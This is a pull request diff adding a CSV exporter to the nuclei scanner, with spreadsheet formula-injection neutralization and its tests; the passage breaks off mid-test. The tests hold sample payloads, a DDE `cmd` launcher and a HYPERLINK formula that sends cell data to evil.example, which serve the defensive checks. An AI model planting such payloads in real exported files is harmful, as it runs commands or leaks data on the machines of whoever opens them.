### PR TITLE
feat(reporting): add CSV result exporter (-csv-export)

### DIFF
--- a/cmd/nuclei/main.go
+++ b/cmd/nuclei/main.go
@@ -340,6 +340,7 @@ on extensive configurability, massive extensibility and ease of use.`)
 		flagSet.StringVarP(&options.SarifExport, "sarif-export", "se", "", "file to export results in SARIF format"),
 		flagSet.StringVarP(&options.JSONExport, "json-export", "je", "", "file to export results in JSON format"),
 		flagSet.StringVarP(&options.JSONLExport, "jsonl-export", "jle", "", "file to export results in JSONL(ine) format"),
+		flagSet.StringVarP(&options.CSVExport, "csv-export", "ce", "", "file to export results in CSV format"),
 		flagSet.StringVarP(&options.PDFExport, "pdf-export", "pe", "", "file to export results in PDF format"),
 		flagSet.StringSliceVarP(&options.Redact, "redact", "rd", nil, "redact given list of keys from query parameter, request header and body", goflags.CommaSeparatedStringSliceOptions),
 	)

--- a/internal/runner/options.go
+++ b/internal/runner/options.go
@@ -23,6 +23,7 @@ import (
 	"github.com/projectdiscovery/nuclei/v3/pkg/protocols/common/utils/vardump"
 	"github.com/projectdiscovery/nuclei/v3/pkg/protocols/headless/engine"
 	"github.com/projectdiscovery/nuclei/v3/pkg/reporting"
+	"github.com/projectdiscovery/nuclei/v3/pkg/reporting/exporters/csv"
 	"github.com/projectdiscovery/nuclei/v3/pkg/reporting/exporters/jsonexporter"
 	"github.com/projectdiscovery/nuclei/v3/pkg/reporting/exporters/jsonl"
 	"github.com/projectdiscovery/nuclei/v3/pkg/reporting/exporters/markdown"
@@ -352,6 +353,16 @@ func createReportingOptions(options *types.Options) (*reporting.Options, error) 
 			reportingOptions.JSONLExporter = &jsonl.Options{
 				File:    options.JSONLExport,
 				OmitRaw: options.OmitRawRequests,
+			}
+		}
+	}
+	if options.CSVExport != "" {
+		// Combine the CLI options with the config file options with the CLI options taking precedence
+		if reportingOptions.CSVExporter != nil {
+			reportingOptions.CSVExporter.File = options.CSVExport
+		} else {
+			reportingOptions.CSVExporter = &csv.Options{
+				File: options.CSVExport,
 			}
 		}
 	}

--- a/pkg/reporting/exporters/csv/csv.go
+++ b/pkg/reporting/exporters/csv/csv.go
@@ -1,0 +1,114 @@
+package csv
+
+import (
+	"encoding/csv"
+	"os"
+	"strconv"
+	"sync"
+	"time"
+
+	"github.com/pkg/errors"
+	"github.com/projectdiscovery/nuclei/v3/pkg/output"
+)
+
+// Options contains the configuration options for the CSV exporter client
+type Options struct {
+	// File is the file to export found CSV result to
+	File string `yaml:"file"`
+}
+
+// header is the ordered list of columns written to the CSV file. The mapping is
+// intentionally flat and stable so the output can be ingested directly by
+// spreadsheets, SIEM/SOC pipelines and ticketing systems without further
+// transformation.
+var header = []string{
+	"template-id",
+	"severity",
+	"host",
+	"matched-at",
+	"cve",
+	"cvss",
+	"timestamp",
+}
+
+// Exporter is an exporter for nuclei results in CSV format
+type Exporter struct {
+	options    *Options
+	mutex      *sync.Mutex
+	writer     *csv.Writer
+	outputFile *os.File
+}
+
+// New creates a new CSV exporter integration client based on options.
+func New(options *Options) (*Exporter, error) {
+	outputFile, err := os.Create(options.File)
+	if err != nil {
+		return nil, errors.Wrap(err, "failed to create CSV file")
+	}
+
+	writer := csv.NewWriter(outputFile)
+	if err := writer.Write(header); err != nil {
+		_ = outputFile.Close()
+		return nil, errors.Wrap(err, "failed to write CSV header")
+	}
+
+	return &Exporter{
+		mutex:      &sync.Mutex{},
+		options:    options,
+		writer:     writer,
+		outputFile: outputFile,
+	}, nil
+}
+
+// Export appends the passed result event as a flattened row to the CSV file
+func (exporter *Exporter) Export(event *output.ResultEvent) error {
+	exporter.mutex.Lock()
+	defer exporter.mutex.Unlock()
+
+	if err := exporter.writer.Write(formatRow(event)); err != nil {
+		return errors.Wrap(err, "failed to write CSV row")
+	}
+
+	return nil
+}
+
+// formatRow flattens a ResultEvent into the ordered set of CSV columns defined
+// by header. Empty values are emitted for fields that are not present on the
+// event (for example, templates without CVE/CVSS classification metadata).
+func formatRow(event *output.ResultEvent) []string {
+	var cve, cvss string
+	if event.Info.Classification != nil {
+		cve = event.Info.Classification.CVEID.String()
+		if event.Info.Classification.CVSSScore > 0 {
+			cvss = strconv.FormatFloat(event.Info.Classification.CVSSScore, 'f', -1, 64)
+		}
+	}
+
+	return []string{
+		event.TemplateID,
+		event.Info.SeverityHolder.Severity.String(),
+		event.Host,
+		event.Matched,
+		cve,
+		cvss,
+		event.Timestamp.UTC().Format(time.RFC3339),
+	}
+}
+
+// Close flushes any buffered rows and closes the CSV file
+func (exporter *Exporter) Close() error {
+	exporter.mutex.Lock()
+	defer exporter.mutex.Unlock()
+
+	exporter.writer.Flush()
+	if err := exporter.writer.Error(); err != nil {
+		_ = exporter.outputFile.Close()
+		return errors.Wrap(err, "failed to flush CSV file")
+	}
+
+	if err := exporter.outputFile.Close(); err != nil {
+		return errors.Wrap(err, "failed to close CSV file")
+	}
+
+	return nil
+}

--- a/pkg/reporting/exporters/csv/csv.go
+++ b/pkg/reporting/exporters/csv/csv.go
@@ -4,6 +4,7 @@ import (
 	"encoding/csv"
 	"os"
 	"strconv"
+	"strings"
 	"sync"
 	"time"
 
@@ -17,17 +18,38 @@ type Options struct {
 	File string `yaml:"file"`
 }
 
-// header is the ordered list of columns written to the CSV file. The mapping is
-// intentionally flat and stable so the output can be ingested directly by
-// spreadsheets, SIEM/SOC pipelines and ticketing systems without further
-// transformation.
+// header is the ordered list of columns written to the CSV file.
+//
+// The schema is a flattened full row of the result event: everything a triage
+// or GRC workflow normally needs is present as its own column, so the file can
+// be opened in a spreadsheet or handed to a ticketing/SIEM intake without any
+// further transformation.
+//
+// Column names mirror the JSON/JSONL keys of output.ResultEvent one-for-one so
+// a column can always be traced back to the field it came from, and match the
+// names httpx uses in its own CSV mode where they overlap (host, port,
+// timestamp). The two exceptions are template-name and template-type, which map
+// to info.name and type: bare "name"/"type" are ambiguous as spreadsheet
+// headers.
 var header = []string{
 	"template-id",
+	"template-name",
+	"template-type",
 	"severity",
 	"host",
+	"ip",
+	"port",
 	"matched-at",
-	"cve",
-	"cvss",
+	"matcher-name",
+	"extractor-name",
+	"extracted-results",
+	"cve-id",
+	"cwe-id",
+	"cvss-metrics",
+	"cvss-score",
+	"description",
+	"reference",
+	"curl-command",
 	"timestamp",
 }
 
@@ -51,6 +73,11 @@ func New(options *Options) (*Exporter, error) {
 		_ = outputFile.Close()
 		return nil, errors.Wrap(err, "failed to write CSV header")
 	}
+	writer.Flush()
+	if err := writer.Error(); err != nil {
+		_ = outputFile.Close()
+		return nil, errors.Wrap(err, "failed to write CSV header")
+	}
 
 	return &Exporter{
 		mutex:      &sync.Mutex{},
@@ -60,12 +87,18 @@ func New(options *Options) (*Exporter, error) {
 	}, nil
 }
 
-// Export appends the passed result event as a flattened row to the CSV file
+// Export appends the passed result event as a flattened row to the CSV file.
+// Rows are flushed as they are written so the file is complete and readable
+// while a long scan is still running.
 func (exporter *Exporter) Export(event *output.ResultEvent) error {
 	exporter.mutex.Lock()
 	defer exporter.mutex.Unlock()
 
 	if err := exporter.writer.Write(formatRow(event)); err != nil {
+		return errors.Wrap(err, "failed to write CSV row")
+	}
+	exporter.writer.Flush()
+	if err := exporter.writer.Error(); err != nil {
 		return errors.Wrap(err, "failed to write CSV row")
 	}
 
@@ -75,22 +108,52 @@ func (exporter *Exporter) Export(event *output.ResultEvent) error {
 // formatRow flattens a ResultEvent into the ordered set of CSV columns defined
 // by header. Empty values are emitted for fields that are not present on the
 // event (for example, templates without CVE/CVSS classification metadata).
+//
+// Every value is handed to encoding/csv unmodified, so values carrying commas,
+// double quotes or newlines are quoted per RFC 4180 instead of breaking the
+// column layout.
 func formatRow(event *output.ResultEvent) []string {
-	var cve, cvss string
+	var cve, cwe, cvssMetrics, cvssScore string
 	if event.Info.Classification != nil {
-		cve = event.Info.Classification.CVEID.String()
-		if event.Info.Classification.CVSSScore > 0 {
-			cvss = strconv.FormatFloat(event.Info.Classification.CVSSScore, 'f', -1, 64)
+		classification := event.Info.Classification
+		cve = classification.CVEID.String()
+		cwe = classification.CWEID.String()
+		cvssMetrics = classification.CVSSMetrics
+		if classification.CVSSScore > 0 {
+			cvssScore = strconv.FormatFloat(classification.CVSSScore, 'f', -1, 64)
 		}
+	}
+
+	// References are URLs and can themselves contain a comma, so they are
+	// newline separated inside the (quoted) cell rather than comma separated.
+	var reference string
+	if event.Info.Reference != nil {
+		reference = strings.Join(event.Info.Reference.ToSlice(), "\n")
 	}
 
 	return []string{
 		event.TemplateID,
+		event.Info.Name,
+		event.Type,
 		event.Info.SeverityHolder.Severity.String(),
 		event.Host,
+		event.IP,
+		event.Port,
 		event.Matched,
+		event.MatcherName,
+		event.ExtractorName,
+		// Extracted results are arbitrary response-derived data and can contain
+		// commas, so they are newline separated inside the (quoted) cell rather
+		// than comma separated. CVE/CWE identifiers cannot contain a comma, so
+		// those keep the ", " form used everywhere else in nuclei.
+		strings.Join(event.ExtractedResults, "\n"),
 		cve,
-		cvss,
+		cwe,
+		cvssMetrics,
+		cvssScore,
+		event.Info.Description,
+		reference,
+		event.CURLCommand,
 		event.Timestamp.UTC().Format(time.RFC3339),
 	}
 }

--- a/pkg/reporting/exporters/csv/csv.go
+++ b/pkg/reporting/exporters/csv/csv.go
@@ -105,13 +105,54 @@ func (exporter *Exporter) Export(event *output.ResultEvent) error {
 	return nil
 }
 
+// formulaTriggers are the leading characters that Excel, LibreOffice Calc and
+// Google Sheets treat as the start of a formula. A cell beginning with one of
+// them is evaluated when the file is opened, so a response-derived value such
+// as `=cmd|'/C calc'!A0` captured by an extractor would execute on the machine
+// of whoever opens the export (CWE-1236).
+const formulaTriggers = "=+-@\t\r"
+
+// neutralizeFormula prefixes a single apostrophe to any value a spreadsheet
+// would evaluate as a formula, which forces the cell to be read as text.
+//
+// The transformation is reversible: the original value is the cell with at most
+// one leading apostrophe removed. Values that parse as a plain number are left
+// untouched so numeric columns (cvss-score, port) stay sortable and a negative
+// number is not needlessly quoted.
+func neutralizeFormula(value string) string {
+	if value == "" || !strings.ContainsRune(formulaTriggers, rune(value[0])) {
+		return value
+	}
+	if _, err := strconv.ParseFloat(value, 64); err == nil {
+		return value
+	}
+	return "'" + value
+}
+
+// neutralizeAndJoin newline-joins a multi-value column, neutralizing each
+// element rather than only the resulting cell. Consumers routinely split these
+// cells back into their individual values, so every element has to be safe on
+// its own and not just the first one.
+func neutralizeAndJoin(values []string) string {
+	if len(values) == 0 {
+		return ""
+	}
+	neutralized := make([]string, 0, len(values))
+	for _, value := range values {
+		neutralized = append(neutralized, neutralizeFormula(value))
+	}
+	return strings.Join(neutralized, "\n")
+}
+
 // formatRow flattens a ResultEvent into the ordered set of CSV columns defined
 // by header. Empty values are emitted for fields that are not present on the
 // event (for example, templates without CVE/CVSS classification metadata).
 //
-// Every value is handed to encoding/csv unmodified, so values carrying commas,
-// double quotes or newlines are quoted per RFC 4180 instead of breaking the
-// column layout.
+// Two separate escaping concerns are handled here. Structural injection is
+// handled by encoding/csv, which RFC 4180-quotes any value carrying a comma,
+// double quote or newline so it cannot forge extra columns or rows. Spreadsheet
+// formula evaluation is handled by neutralizeFormula, because the target of
+// this exporter is explicitly a file someone opens in a spreadsheet.
 func formatRow(event *output.ResultEvent) []string {
 	var cve, cwe, cvssMetrics, cvssScore string
 	if event.Info.Classification != nil {
@@ -128,32 +169,32 @@ func formatRow(event *output.ResultEvent) []string {
 	// newline separated inside the (quoted) cell rather than comma separated.
 	var reference string
 	if event.Info.Reference != nil {
-		reference = strings.Join(event.Info.Reference.ToSlice(), "\n")
+		reference = neutralizeAndJoin(event.Info.Reference.ToSlice())
 	}
 
 	return []string{
-		event.TemplateID,
-		event.Info.Name,
-		event.Type,
+		neutralizeFormula(event.TemplateID),
+		neutralizeFormula(event.Info.Name),
+		neutralizeFormula(event.Type),
 		event.Info.SeverityHolder.Severity.String(),
-		event.Host,
-		event.IP,
-		event.Port,
-		event.Matched,
-		event.MatcherName,
-		event.ExtractorName,
+		neutralizeFormula(event.Host),
+		neutralizeFormula(event.IP),
+		neutralizeFormula(event.Port),
+		neutralizeFormula(event.Matched),
+		neutralizeFormula(event.MatcherName),
+		neutralizeFormula(event.ExtractorName),
 		// Extracted results are arbitrary response-derived data and can contain
 		// commas, so they are newline separated inside the (quoted) cell rather
 		// than comma separated. CVE/CWE identifiers cannot contain a comma, so
 		// those keep the ", " form used everywhere else in nuclei.
-		strings.Join(event.ExtractedResults, "\n"),
+		neutralizeAndJoin(event.ExtractedResults),
 		cve,
 		cwe,
-		cvssMetrics,
+		neutralizeFormula(cvssMetrics),
 		cvssScore,
-		event.Info.Description,
+		neutralizeFormula(event.Info.Description),
 		reference,
-		event.CURLCommand,
+		neutralizeFormula(event.CURLCommand),
 		event.Timestamp.UTC().Format(time.RFC3339),
 	}
 }

--- a/pkg/reporting/exporters/csv/csv_test.go
+++ b/pkg/reporting/exporters/csv/csv_test.go
@@ -1,0 +1,153 @@
+package csv
+
+import (
+	encodingcsv "encoding/csv"
+	"os"
+	"path/filepath"
+	"testing"
+	"time"
+
+	"github.com/stretchr/testify/require"
+
+	"github.com/projectdiscovery/nuclei/v3/pkg/model"
+	"github.com/projectdiscovery/nuclei/v3/pkg/model/types/severity"
+	"github.com/projectdiscovery/nuclei/v3/pkg/model/types/stringslice"
+	"github.com/projectdiscovery/nuclei/v3/pkg/output"
+)
+
+// readCSV is a small helper that fully parses the exporter output back into
+// records so assertions are made against decoded CSV rather than raw bytes.
+func readCSV(t *testing.T, path string) [][]string {
+	t.Helper()
+	f, err := os.Open(path)
+	require.NoError(t, err)
+	defer func() { _ = f.Close() }()
+
+	records, err := encodingcsv.NewReader(f).ReadAll()
+	require.NoError(t, err)
+	return records
+}
+
+func TestCSVExporterWritesHeaderAndFlattenedRows(t *testing.T) {
+	file := filepath.Join(t.TempDir(), "results.csv")
+
+	exporter, err := New(&Options{File: file})
+	require.NoError(t, err)
+
+	ts := time.Date(2025, 1, 2, 3, 4, 5, 0, time.UTC)
+	event := &output.ResultEvent{
+		TemplateID: "CVE-2021-44228",
+		Info: model.Info{
+			SeverityHolder: severity.Holder{Severity: severity.Critical},
+			Classification: &model.Classification{
+				CVEID:     stringslice.StringSlice{Value: "CVE-2021-44228"},
+				CVSSScore: 10.0,
+			},
+		},
+		Host:      "https://example.com",
+		Matched:   "https://example.com/api",
+		Timestamp: ts,
+	}
+
+	require.NoError(t, exporter.Export(event))
+	require.NoError(t, exporter.Close())
+
+	records := readCSV(t, file)
+	require.Len(t, records, 2, "expected header + one data row")
+	require.Equal(t, header, records[0])
+	require.Equal(t, []string{
+		"CVE-2021-44228",
+		"critical",
+		"https://example.com",
+		"https://example.com/api",
+		"CVE-2021-44228",
+		"10",
+		"2025-01-02T03:04:05Z",
+	}, records[1])
+}
+
+func TestCSVExporterHandlesMissingClassification(t *testing.T) {
+	file := filepath.Join(t.TempDir(), "results.csv")
+
+	exporter, err := New(&Options{File: file})
+	require.NoError(t, err)
+
+	event := &output.ResultEvent{
+		TemplateID: "tech-detect",
+		Info: model.Info{
+			SeverityHolder: severity.Holder{Severity: severity.Info},
+		},
+		Host:      "example.org",
+		Matched:   "example.org",
+		Timestamp: time.Date(2025, 6, 1, 0, 0, 0, 0, time.UTC),
+	}
+
+	require.NoError(t, exporter.Export(event))
+	require.NoError(t, exporter.Close())
+
+	records := readCSV(t, file)
+	require.Len(t, records, 2)
+	// cve and cvss columns must be empty, not "0" or "<nil>", when the template
+	// carries no classification metadata.
+	require.Equal(t, "", records[1][4])
+	require.Equal(t, "", records[1][5])
+	require.Equal(t, "info", records[1][1])
+}
+
+func TestCSVExporterEscapesInjectionProneFields(t *testing.T) {
+	file := filepath.Join(t.TempDir(), "results.csv")
+
+	exporter, err := New(&Options{File: file})
+	require.NoError(t, err)
+
+	// Host/matched-at are attacker-influenced. Values containing commas,
+	// quotes and newlines must round-trip through encoding/csv without
+	// corrupting the column layout.
+	event := &output.ResultEvent{
+		TemplateID: "weird,id\"with\nnewline",
+		Info: model.Info{
+			SeverityHolder: severity.Holder{Severity: severity.High},
+		},
+		Host:      "a,b\"c",
+		Matched:   "line1\nline2",
+		Timestamp: time.Date(2025, 6, 1, 0, 0, 0, 0, time.UTC),
+	}
+
+	require.NoError(t, exporter.Export(event))
+	require.NoError(t, exporter.Close())
+
+	records := readCSV(t, file)
+	require.Len(t, records, 2)
+	require.Equal(t, "weird,id\"with\nnewline", records[1][0])
+	require.Equal(t, "a,b\"c", records[1][2])
+	require.Equal(t, "line1\nline2", records[1][3])
+}
+
+func TestCSVExporterJoinsMultipleCVEs(t *testing.T) {
+	file := filepath.Join(t.TempDir(), "results.csv")
+
+	exporter, err := New(&Options{File: file})
+	require.NoError(t, err)
+
+	event := &output.ResultEvent{
+		TemplateID: "multi-cve",
+		Info: model.Info{
+			SeverityHolder: severity.Holder{Severity: severity.Medium},
+			Classification: &model.Classification{
+				CVEID:     stringslice.StringSlice{Value: []string{"CVE-2020-0001", "CVE-2020-0002"}},
+				CVSSScore: 5.5,
+			},
+		},
+		Host:      "example.net",
+		Matched:   "example.net",
+		Timestamp: time.Date(2025, 6, 1, 0, 0, 0, 0, time.UTC),
+	}
+
+	require.NoError(t, exporter.Export(event))
+	require.NoError(t, exporter.Close())
+
+	records := readCSV(t, file)
+	require.Len(t, records, 2)
+	require.Equal(t, "CVE-2020-0001, CVE-2020-0002", records[1][4])
+	require.Equal(t, "5.5", records[1][5])
+}

--- a/pkg/reporting/exporters/csv/csv_test.go
+++ b/pkg/reporting/exporters/csv/csv_test.go
@@ -271,3 +271,108 @@ func TestCSVExporterFlushesRowsBeforeClose(t *testing.T) {
 
 	require.NoError(t, exporter.Close())
 }
+
+// TestCSVExporterNeutralizesSpreadsheetFormulas covers the second half of the
+// escaping problem. encoding/csv stops a value from breaking out of its cell,
+// but it does not stop a spreadsheet from evaluating that cell as a formula.
+// ExtractedResults in particular is raw response-derived data, so a target can
+// choose exactly what lands in it.
+func TestCSVExporterNeutralizesSpreadsheetFormulas(t *testing.T) {
+	const (
+		ddePayload       = `=cmd|'/C calc'!A0`
+		hyperlinkPayload = `=HYPERLINK("http://evil.example/log?d="&A1,"click")`
+		atPayload        = `@SUM(1+1)`
+		plusPayload      = `+1+1`
+		tabPayload       = "\t=1+1"
+		crPayload        = "\r=1+1"
+		safeValue        = "http://127.0.0.1:8080/index.html"
+		negativeNumber   = "-1"
+	)
+
+	event := &output.ResultEvent{
+		TemplateID: ddePayload,
+		Type:       "http",
+		Info: model.Info{
+			Name:           atPayload,
+			Description:    plusPayload,
+			Reference:      stringslice.NewRawStringSlice([]string{safeValue, hyperlinkPayload}),
+			SeverityHolder: severity.Holder{Severity: severity.High},
+			Classification: &model.Classification{
+				CVSSScore: 9.8,
+			},
+		},
+		Host:             tabPayload,
+		Matched:          safeValue,
+		MatcherName:      crPayload,
+		ExtractedResults: []string{safeValue, ddePayload, negativeNumber, hyperlinkPayload},
+		CURLCommand:      ddePayload,
+		Timestamp:        time.Date(2025, 6, 1, 0, 0, 0, 0, time.UTC),
+	}
+
+	records := export(t, event)
+	require.Len(t, records, 2)
+	row := records[1]
+	require.Len(t, row, len(header))
+
+	// every formula-triggering cell is prefixed with a single apostrophe, and
+	// the original value is recoverable by removing exactly that apostrophe
+	for _, tc := range []struct {
+		column string
+		want   string
+	}{
+		{"template-id", ddePayload},
+		{"template-name", atPayload},
+		{"description", plusPayload},
+		{"host", tabPayload},
+		{"matcher-name", crPayload},
+		{"curl-command", ddePayload},
+	} {
+		got := row[column(t, tc.column)]
+		require.Equal(t, "'"+tc.want, got, "column %s must be neutralized", tc.column)
+		require.Equal(t, tc.want, strings.TrimPrefix(got, "'"), "column %s must stay recoverable", tc.column)
+	}
+
+	// values that are not formulas are left byte-for-byte alone, so the export
+	// does not become littered with apostrophes
+	require.Equal(t, safeValue, row[column(t, "matched-at")])
+	require.Equal(t, "high", row[column(t, "severity")])
+	// a numeric cell stays numeric and sortable rather than becoming text
+	require.Equal(t, "9.8", row[column(t, "cvss-score")])
+
+	// multi-value cells are neutralized per element, not just at the start of
+	// the cell, because consumers split these cells back apart
+	require.Equal(t,
+		[]string{safeValue, "'" + ddePayload, negativeNumber, "'" + hyperlinkPayload},
+		strings.Split(row[column(t, "extracted-results")], "\n"))
+	require.Equal(t,
+		[]string{safeValue, "'" + hyperlinkPayload},
+		strings.Split(row[column(t, "reference")], "\n"))
+}
+
+func TestNeutralizeFormula(t *testing.T) {
+	for _, tc := range []struct {
+		name  string
+		input string
+		want  string
+	}{
+		{"empty", "", ""},
+		{"plain text", "nuclei", "nuclei"},
+		{"url", "http://example.com/a=b", "http://example.com/a=b"},
+		{"equals", "=1+1", "'=1+1"},
+		{"plus", "+1+1", "'+1+1"},
+		{"at", "@SUM(1)", "'@SUM(1)"},
+		{"tab", "\t=1+1", "'\t=1+1"},
+		{"carriage return", "\r=1+1", "'\r=1+1"},
+		{"negative integer stays numeric", "-1", "-1"},
+		{"negative float stays numeric", "-1.5", "-1.5"},
+		{"positive signed number stays numeric", "+9.8", "+9.8"},
+		{"minus leading text is neutralized", "-cmd|'/C calc'!A0", "'-cmd|'/C calc'!A0"},
+		{"leading space is not a trigger", " =1+1", " =1+1"},
+		{"already neutralized is left alone", "'=1+1", "'=1+1"},
+		{"non-ascii leading rune", "é=1+1", "é=1+1"},
+	} {
+		t.Run(tc.name, func(t *testing.T) {
+			require.Equal(t, tc.want, neutralizeFormula(tc.input))
+		})
+	}
+}

--- a/pkg/reporting/exporters/csv/csv_test.go
+++ b/pkg/reporting/exporters/csv/csv_test.go
@@ -4,6 +4,7 @@ import (
 	encodingcsv "encoding/csv"
 	"os"
 	"path/filepath"
+	"strings"
 	"testing"
 	"time"
 
@@ -28,53 +29,93 @@ func readCSV(t *testing.T, path string) [][]string {
 	return records
 }
 
-func TestCSVExporterWritesHeaderAndFlattenedRows(t *testing.T) {
+// column resolves a header name to its index so assertions do not depend on
+// the ordinal position of a column.
+func column(t *testing.T, name string) int {
+	t.Helper()
+	for i, h := range header {
+		if h == name {
+			return i
+		}
+	}
+	t.Fatalf("unknown CSV column %q", name)
+	return -1
+}
+
+// export writes a single event through the exporter and returns the decoded
+// records (header row included).
+func export(t *testing.T, event *output.ResultEvent) [][]string {
+	t.Helper()
 	file := filepath.Join(t.TempDir(), "results.csv")
 
 	exporter, err := New(&Options{File: file})
 	require.NoError(t, err)
-
-	ts := time.Date(2025, 1, 2, 3, 4, 5, 0, time.UTC)
-	event := &output.ResultEvent{
-		TemplateID: "CVE-2021-44228",
-		Info: model.Info{
-			SeverityHolder: severity.Holder{Severity: severity.Critical},
-			Classification: &model.Classification{
-				CVEID:     stringslice.StringSlice{Value: "CVE-2021-44228"},
-				CVSSScore: 10.0,
-			},
-		},
-		Host:      "https://example.com",
-		Matched:   "https://example.com/api",
-		Timestamp: ts,
-	}
-
 	require.NoError(t, exporter.Export(event))
 	require.NoError(t, exporter.Close())
 
-	records := readCSV(t, file)
+	return readCSV(t, file)
+}
+
+func TestCSVExporterWritesHeaderAndFlattenedRows(t *testing.T) {
+	ts := time.Date(2025, 1, 2, 3, 4, 5, 0, time.UTC)
+	event := &output.ResultEvent{
+		TemplateID: "CVE-2021-44228",
+		Type:       "http",
+		Info: model.Info{
+			Name:           "Apache Log4j2 Remote Code Execution",
+			Description:    "Apache Log4j2 JNDI features do not protect against attacker controlled LDAP endpoints.",
+			Reference:      stringslice.NewRawStringSlice([]string{"https://logging.apache.org/log4j/2.x/security.html"}),
+			SeverityHolder: severity.Holder{Severity: severity.Critical},
+			Classification: &model.Classification{
+				CVEID:       stringslice.StringSlice{Value: "CVE-2021-44228"},
+				CWEID:       stringslice.StringSlice{Value: "CWE-502"},
+				CVSSMetrics: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
+				CVSSScore:   10.0,
+			},
+		},
+		Host:             "https://example.com",
+		IP:               "93.184.216.34",
+		Port:             "443",
+		Matched:          "https://example.com/api",
+		MatcherName:      "jndi-ldap",
+		ExtractorName:    "version",
+		ExtractedResults: []string{"2.14.1"},
+		CURLCommand:      "curl -X 'GET' 'https://example.com/api'",
+		Timestamp:        ts,
+	}
+
+	records := export(t, event)
 	require.Len(t, records, 2, "expected header + one data row")
 	require.Equal(t, header, records[0])
 	require.Equal(t, []string{
 		"CVE-2021-44228",
+		"Apache Log4j2 Remote Code Execution",
+		"http",
 		"critical",
 		"https://example.com",
+		"93.184.216.34",
+		"443",
 		"https://example.com/api",
+		"jndi-ldap",
+		"version",
+		"2.14.1",
 		"CVE-2021-44228",
+		"CWE-502",
+		"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
 		"10",
+		"Apache Log4j2 JNDI features do not protect against attacker controlled LDAP endpoints.",
+		"https://logging.apache.org/log4j/2.x/security.html",
+		"curl -X 'GET' 'https://example.com/api'",
 		"2025-01-02T03:04:05Z",
 	}, records[1])
 }
 
 func TestCSVExporterHandlesMissingClassification(t *testing.T) {
-	file := filepath.Join(t.TempDir(), "results.csv")
-
-	exporter, err := New(&Options{File: file})
-	require.NoError(t, err)
-
 	event := &output.ResultEvent{
 		TemplateID: "tech-detect",
+		Type:       "http",
 		Info: model.Info{
+			Name:           "Wappalyzer Technology Detection",
 			SeverityHolder: severity.Holder{Severity: severity.Info},
 		},
 		Host:      "example.org",
@@ -82,59 +123,112 @@ func TestCSVExporterHandlesMissingClassification(t *testing.T) {
 		Timestamp: time.Date(2025, 6, 1, 0, 0, 0, 0, time.UTC),
 	}
 
-	require.NoError(t, exporter.Export(event))
-	require.NoError(t, exporter.Close())
-
-	records := readCSV(t, file)
+	records := export(t, event)
 	require.Len(t, records, 2)
-	// cve and cvss columns must be empty, not "0" or "<nil>", when the template
-	// carries no classification metadata.
-	require.Equal(t, "", records[1][4])
-	require.Equal(t, "", records[1][5])
-	require.Equal(t, "info", records[1][1])
+	// classification-derived and reference columns must be empty, not "0" or
+	// "<nil>", when the template carries no such metadata.
+	for _, name := range []string{"cve-id", "cwe-id", "cvss-metrics", "cvss-score", "reference", "description"} {
+		require.Equal(t, "", records[1][column(t, name)], "column %s should be empty", name)
+	}
+	require.Equal(t, "info", records[1][column(t, "severity")])
+	// every row still carries exactly one cell per header column
+	require.Len(t, records[1], len(header))
 }
 
-func TestCSVExporterEscapesInjectionProneFields(t *testing.T) {
-	file := filepath.Join(t.TempDir(), "results.csv")
+// TestCSVExporterEscapesStructuralCharacters is the reason this exporter writes
+// through encoding/csv rather than leaving CSV assembly to the consumer: every
+// value below is attacker-influenced and contains characters that are
+// structural in CSV. A hand-rolled join (jq's @csv on a subset of fields, an
+// fmt.Sprintf with commas, ...) either forges extra columns or truncates a row.
+// Here the values must survive a full write/parse round trip byte for byte and
+// the row must keep exactly len(header) cells.
+func TestCSVExporterEscapesStructuralCharacters(t *testing.T) {
+	const (
+		commaValue   = "a,b,c"
+		quoteValue   = `he said "hi", then left`
+		newlineValue = "line1\nline2"
+		crlfValue    = "line1\r\nline2"
+		mixedValue   = "GET /a,b?q=\"x\" HTTP/1.1\r\nHost: evil\n"
+	)
 
-	exporter, err := New(&Options{File: file})
-	require.NoError(t, err)
-
-	// Host/matched-at are attacker-influenced. Values containing commas,
-	// quotes and newlines must round-trip through encoding/csv without
-	// corrupting the column layout.
 	event := &output.ResultEvent{
-		TemplateID: "weird,id\"with\nnewline",
+		TemplateID: commaValue,
+		Type:       quoteValue,
 		Info: model.Info{
+			Name:           mixedValue,
+			Description:    newlineValue,
+			Reference:      stringslice.NewRawStringSlice([]string{commaValue, quoteValue}),
 			SeverityHolder: severity.Holder{Severity: severity.High},
 		},
-		Host:      "a,b\"c",
-		Matched:   "line1\nline2",
-		Timestamp: time.Date(2025, 6, 1, 0, 0, 0, 0, time.UTC),
+		Host:             quoteValue,
+		IP:               commaValue,
+		Port:             newlineValue,
+		Matched:          mixedValue,
+		MatcherName:      crlfValue,
+		ExtractorName:    quoteValue,
+		ExtractedResults: []string{commaValue, quoteValue, newlineValue},
+		CURLCommand:      mixedValue,
+		Timestamp:        time.Date(2025, 6, 1, 0, 0, 0, 0, time.UTC),
 	}
 
+	file := filepath.Join(t.TempDir(), "results.csv")
+	exporter, err := New(&Options{File: file})
+	require.NoError(t, err)
 	require.NoError(t, exporter.Export(event))
 	require.NoError(t, exporter.Close())
 
+	// 1. the raw file must quote the cells and double the embedded quotes
+	raw, err := os.ReadFile(file)
+	require.NoError(t, err)
+	require.Contains(t, string(raw), `"a,b,c"`)
+	require.Contains(t, string(raw), `"he said ""hi"", then left"`)
+
+	// 2. the file must still parse as exactly two records of len(header) cells,
+	//    i.e. no injected/forged columns and no truncated row
 	records := readCSV(t, file)
 	require.Len(t, records, 2)
-	require.Equal(t, "weird,id\"with\nnewline", records[1][0])
-	require.Equal(t, "a,b\"c", records[1][2])
-	require.Equal(t, "line1\nline2", records[1][3])
+	require.Len(t, records[0], len(header))
+	require.Len(t, records[1], len(header))
+
+	// 3. every value must round trip unchanged. encoding/csv collapses a \r\n
+	//    inside a quoted field to \n when reading it back, so the expectation is
+	//    normalised the same way; nothing else about the value may change.
+	lf := func(s string) string { return strings.ReplaceAll(s, "\r\n", "\n") }
+
+	row := records[1]
+	require.Equal(t, commaValue, row[column(t, "template-id")])
+	require.Equal(t, quoteValue, row[column(t, "template-type")])
+	require.Equal(t, lf(mixedValue), row[column(t, "template-name")])
+	require.Equal(t, quoteValue, row[column(t, "host")])
+	require.Equal(t, commaValue, row[column(t, "ip")])
+	require.Equal(t, newlineValue, row[column(t, "port")])
+	require.Equal(t, lf(mixedValue), row[column(t, "matched-at")])
+	require.Equal(t, quoteValue, row[column(t, "extractor-name")])
